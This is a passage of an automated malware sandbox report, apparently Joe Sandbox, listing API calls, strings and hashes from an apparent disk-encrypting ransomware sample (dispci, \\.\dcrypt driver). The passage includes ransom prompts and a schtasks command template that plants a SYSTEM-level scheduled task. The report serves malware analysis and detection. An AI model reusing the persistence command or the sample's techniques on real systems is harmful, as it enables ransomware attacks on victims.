                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 9eec7e6bb879fa08688c2f23efa70666c166e5e01bd3b8cb3dfa52fa39d30b99
                                                                      • Instruction ID: 030d3b58b4ab21e6ae7d8d247107ebf82c1fe919cfa3e5b64755305876d42571
                                                                      • Opcode Fuzzy Hash: 9eec7e6bb879fa08688c2f23efa70666c166e5e01bd3b8cb3dfa52fa39d30b99
                                                                      • Instruction Fuzzy Hash: CA61FC75C012199FCB20AFB1DC48BEDBBB8FB08301F058599E649A3251DB759AC8CF61
                                                                      Function 00DF49A6 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 152threadtimewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 1b448373cfe78428009df115d48d24c0abd6558a74958dcf2802140d83f9874e
                                                                      • Instruction ID: 4aa290a3b61b635b3a3d1c73ff178fbdd0b7d896c8ed62726f0bb4716a5f2b0b
                                                                      • Opcode Fuzzy Hash: 1b448373cfe78428009df115d48d24c0abd6558a74958dcf2802140d83f9874e
                                                                      • Instruction Fuzzy Hash: 0B61FC75C012199FCB10AFB1DC48BEDBBB8FB08301F058599E649A7251DB759AC8CF61
                                                                      Function 00DF4550 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 190synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wprintf.LIBCMT ref: 00DF456B
                                                                        • Part of subcall function 00DF61C0: __lock.LIBCMT ref: 00DF61CE
                                                                        • Part of subcall function 00DF61C0: __getch_nolock.LIBCMT ref: 00DF61D8
                                                                      • GetLogicalDrives.KERNEL32 ref: 00DF4578
                                                                      • _memset.LIBCMT ref: 00DF45D0
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00DF45DF
                                                                      • PathAppendW.SHLWAPI(?,Readme.txt), ref: 00DF45F2
                                                                        • Part of subcall function 00DF4490: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44AA
                                                                        • Part of subcall function 00DF4490: GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44BD
                                                                        • Part of subcall function 00DF4490: GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D0
                                                                        • Part of subcall function 00DF4490: HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D7
                                                                        • Part of subcall function 00DF4490: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44F3
                                                                        • Part of subcall function 00DF4490: GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4504
                                                                        • Part of subcall function 00DF4490: HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF450B
                                                                        • Part of subcall function 00DF4490: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4513
                                                                      • _wprintf.LIBCMT ref: 00DF4673
                                                                      • _wprintf.LIBCMT ref: 00DF4680
                                                                      • _wscanf.LIBCMT ref: 00DF46AC
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF46BC
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00DF46D4
                                                                      • _wprintf.LIBCMT ref: 00DF46F7
                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00DF4706
                                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00DF4712
                                                                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00DF4735
                                                                      • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00DF473D
                                                                      • _wprintf.LIBCMT ref: 00DF474E
                                                                      • _wprintf.LIBCMT ref: 00DF475B
                                                                      • _wscanf.LIBCMT ref: 00DF4787
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF4797
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00DF47AF
                                                                      • _wprintf.LIBCMT ref: 00DF47C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _wprintf$Heap$ConsoleCreateFile$EventHandleObjectProcessSingleWait_wscanf$AllocAppendBufferCharacterCloseCursorDriveDrivesFillFreeInfoLogicalOutputPathPositionReadScreenSizeType__getch_nolock__lock_memset
                                                                      • String ID: Disable your anti-virus and anti-malware programs$Enter password#2: $Files decryption completed$:$Incorrect password$Readme.txt$Visit
                                                                      • API String ID: 2127848508-3595650393
                                                                      • Opcode ID: 254c177ec870f8730d04c1877c005fde17021e22a613c8d289584fb990d901e7
                                                                      • Instruction ID: 5c9b9b6ec10bb6e1976f4c189b24a5816fc48850d7162bd02b4fd256712cf76f
                                                                      • Opcode Fuzzy Hash: 254c177ec870f8730d04c1877c005fde17021e22a613c8d289584fb990d901e7
                                                                      • Instruction Fuzzy Hash: 0661A371D01718AFDB10EB659C45BEE7BB4EF48701F0580A9E609F6280EB719A848FB5
                                                                      Function 00DFA1FF Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00DF6674,00E05CD0,00000014), ref: 00DFA207
                                                                      • __mtterm.LIBCMT ref: 00DFA213
                                                                        • Part of subcall function 00DF9F4C: RtlDecodePointer.NTDLL(00000005), ref: 00DF9F5D
                                                                        • Part of subcall function 00DF9F4C: TlsFree.KERNEL32(00000003,00DFA375,?,00DF6674,00E05CD0,00000014), ref: 00DF9F77
                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DFA229
                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DFA236
                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DFA243
                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DFA250
                                                                      • TlsAlloc.KERNEL32(?,00DF6674,00E05CD0,00000014), ref: 00DFA2A0
                                                                      • TlsSetValue.KERNEL32(00000000,?,00DF6674,00E05CD0,00000014), ref: 00DFA2BB
                                                                      • __init_pointers.LIBCMT ref: 00DFA2C5
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2D6
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2E3
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2F0
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2FD
                                                                      • RtlDecodePointer.NTDLL(00DFA0D0), ref: 00DFA31E
                                                                      • __calloc_crt.LIBCMT ref: 00DFA333
                                                                      • RtlDecodePointer.NTDLL(00000000), ref: 00DFA34D
                                                                      • __initptd.LIBCMT ref: 00DFA358
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFA35F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 3732613303-3819984048
                                                                      • Opcode ID: fd3f799cdf78aa5102c6903df2b95804f5a98b5e5242cc25d4d96756d620453a
                                                                      • Instruction ID: bec6385d19dfddf11e0a4583e3f0ee2f008a0a335a0082197ae68e96e312900b
                                                                      • Opcode Fuzzy Hash: fd3f799cdf78aa5102c6903df2b95804f5a98b5e5242cc25d4d96756d620453a
                                                                      • Instruction Fuzzy Hash: 743162B19053089FCB206B7BBD0572E7AE5EB45720719413AE614F31B0DB3A94C8CF62
                                                                      Function 00DF5910 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 77timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00DF592B
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF593F
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF5979
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF598B
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00DF59F8
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$DirectoryFile$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                                                      • String ID: $ $ $.$/$d$f$r$s$schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00$u$w$x
                                                                      • API String ID: 980647657-2418224214
                                                                      • Opcode ID: d6bd9c16a3d182db967a07696b8028f39a2bb2f31bab8995a1fdd3472c713121
                                                                      • Instruction ID: ed004e1f270f9abcd7189fe7782a8f12737d0fccb86ce691785bdb146beefba0
                                                                      • Opcode Fuzzy Hash: d6bd9c16a3d182db967a07696b8028f39a2bb2f31bab8995a1fdd3472c713121
                                                                      • Instruction Fuzzy Hash: 5C3174B1D0025C9BDB10DF90EC94BFEBBB9EB44345F008599E60576251DBB65A8CCFA0
                                                                      Function 00DF4E00 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 164COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00DF4E24
                                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00DF4E31
                                                                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00DF4E58
                                                                      • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00DF4E60
                                                                      • _wprintf.LIBCMT ref: 00DF4E6B
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4ED8
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4EDF
                                                                      • _wprintf.LIBCMT ref: 00DF4F95
                                                                      • TlsGetValue.KERNEL32(?,00220038,?,00000298,?,00000298,?,00000000), ref: 00DF4FD6
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4FDD
                                                                      • _wprintf.LIBCMT ref: 00DF5006
                                                                      • _wprintf.LIBCMT ref: 00DF5013
                                                                      • _wprintf.LIBCMT ref: 00DF503A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _wprintf$Console$ControlDeviceValue$BufferCharacterCursorFillHandleInfoOutputPositionScreen
                                                                      • String ID: Decryption error %d$Disk decryption completed$%-.3f %%$Disk decryption progress...
                                                                      • API String ID: 3598326828-3817340760
                                                                      • Opcode ID: f8763f5d7261aa125a4109017d0d72dd7358e35ed2144390ec48335d0304018c
                                                                      • Instruction ID: 26b24d3c644acf9bff9cdccf68627c92b701da77ea2d3a1147ca0397745c146c
                                                                      • Opcode Fuzzy Hash: f8763f5d7261aa125a4109017d0d72dd7358e35ed2144390ec48335d0304018c
                                                                      • Instruction Fuzzy Hash: 0E5106B1E0061C9FDB249B64DC45BFFB7B8FB44701F058199E609E6290EA305E84CFA4
                                                                      Function 00DF5BF0 Relevance: 24.5, APIs: 2, Strings: 12, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5C0F
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00DF5C78
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: DirectorySystem$AppendCreateEnvironmentPathProcessVariablelstrcat
                                                                      • String ID: $ $ $.$/$d$f$r$s$u$w$x
                                                                      • API String ID: 1581931562-2588986813
                                                                      • Opcode ID: 083c52a335cfe8b256cc811d4b924a1c3696e440dba0ff839ebc14c8139e27eb
                                                                      • Instruction ID: aecc69a298ee61453e59789a3465cd9be6f47541240c3f27657f57c6a74167a8
                                                                      • Opcode Fuzzy Hash: 083c52a335cfe8b256cc811d4b924a1c3696e440dba0ff839ebc14c8139e27eb
                                                                      • Instruction Fuzzy Hash: 30110CB0D0130C9BDB00DFA1E8597EEBBB6EB08748F008158D6056A255D7B69A5CCFA4
                                                                      Function 00DF2340 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 107memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF235D
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF2370
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2388
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF239D
                                                                      • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF23B9
                                                                      • GetLastError.KERNEL32 ref: 00DF23C3
                                                                      • VirtualLock.KERNEL32(?,00000298), ref: 00DF23D6
                                                                      • TlsGetValue.KERNEL32(?,00220028,?,00000298,?,00000298,?,00000000), ref: 00DF2440
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF2447
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 233298530-1945893055
                                                                      • Opcode ID: ccc5ed0e62239ec2e69dfee299814bdfb6367bd928b7fddc9ccec1648049325a
                                                                      • Instruction ID: 26ec518be5b90c6cf8593dfee2874a14cde942375e2f10e0c4d053e647cc7e79
                                                                      • Opcode Fuzzy Hash: ccc5ed0e62239ec2e69dfee299814bdfb6367bd928b7fddc9ccec1648049325a
                                                                      • Instruction Fuzzy Hash: 2B31E3B5A41309AFEB109BA1DC49FBB776CEB44710F058114FE08BB2D0DAB59D4487B0
                                                                      Function 00DF2470 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF248D
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF24A0
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF24B8
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF24CD
                                                                      • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF24E9
                                                                      • GetLastError.KERNEL32 ref: 00DF24F3
                                                                      • VirtualLock.KERNEL32(?,00000298), ref: 00DF2506
                                                                      • TlsGetValue.KERNEL32(?,0022002C,?,00000298,?,00000298,?,00000000), ref: 00DF256B
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF2572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 233298530-1945893055
                                                                      • Opcode ID: 8876583cf705001cc4616464b1af07b7b5a161b522834c49b68299348bfb8d51
                                                                      • Instruction ID: 38f9a9bfc6d2f461569be86bd855fe7e58261b7eb6d25f59bb74a69196342361
                                                                      • Opcode Fuzzy Hash: 8876583cf705001cc4616464b1af07b7b5a161b522834c49b68299348bfb8d51
                                                                      • Instruction Fuzzy Hash: F7319275A41319BFEB108BA59C49FBB776CEB45711F098114FE04BB2C0DA75DE4487A0
                                                                      Function 00DF1320 Relevance: 16.7, APIs: 11, Instructions: 200memorytimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00DF135A
                                                                      • GetSystemDefaultLCID.KERNEL32 ref: 00DF1375
                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00DF1385
                                                                      • _memmove.LIBCMT ref: 00DF139F
                                                                      • NetWkstaGetInfo.NETAPI32(00E04ED4,00000064,?), ref: 00DF13BD
                                                                      • _memmove.LIBCMT ref: 00DF1436
                                                                      • _memmove.LIBCMT ref: 00DF1467
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00DF14C4
                                                                      • _memmove.LIBCMT ref: 00DF14EF
                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF154F
